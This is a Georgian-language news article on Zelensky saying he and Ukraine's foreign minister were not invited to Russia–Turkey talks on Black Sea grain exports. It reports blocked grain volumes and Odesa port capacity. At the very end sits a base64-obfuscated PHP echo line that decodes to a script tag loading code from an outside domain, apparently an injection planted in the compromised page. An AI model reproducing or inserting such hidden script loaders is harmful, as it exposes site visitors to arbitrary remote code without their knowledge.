celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი, ვოლოდიმირ ზელენსკი აცხადებს, რომ არც ის და არც საგარეო საქმეთა მინისტრი არ არიან მიწვეულნი მარცვლეულის შავი ზღვით ექსპორტის შესახებ რუსეთსა და თურქეთს შორის დაგეგმილ მოლაპარაკებებზე.
 
აღნიშნულის შესახებ, უკრაინის პრეზიდენტმა ჟურნალისტებთან საუბრისას განაცხადა.
 
„მე არ მიმიწვიეს. საგარეო საქმეთა მინისტრი, დღევანდელი მდგომარეობით, არ არის მიწვეული“, – განაცხადა ზელენსკიმ.
 
ზელენსკიმ აღნიშნა, რომ მან თურქეთის პრეზიდენტთან, სხვა საკითხებთან ერთად, თურქული მხარის შუამავლობა განიხილა უკრაინის პორტების განბლოკვის შესახებ.
 
მისივე თქმით, მარცვლეულის ექსპორტთან დაკავშირებით მოლაპარაკებები მიმდინარეობს გაერო-სთან, ასევე ბალტიისპირეთის ქვეყნებთან და პოლონეთთან. ოდესის პორტებით უკრაინას შეუძლია ყოველთვიურად 10 მილიონი ტონა მარცვლეულის ექსპორტი.
 
„თუ ახლა იქ 22-25 მილიონი ტონა გვაქვს დაბლოკილი, შემოდგომაზე შეიძლება უკვე 75 გვქონდეს. რას გავაკეთებთ? ამიტომ, პორტების გარეშე ვერ შევძლებთ“, – ხაზგასმით აღნიშნა ზელენსკიმ.
 
რუსეთსა და თურქეთს შორის შავ ზღვაში საზღვაო გადაზიდვების შესახებ მოლაპარაკებები ანკარაში 8 ივნისს არის დაგეგმილი, რომელშიც რუსეთის საგარეო საქმეთა მინისტრიც მიიღებს მონაწილეობას.
673
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");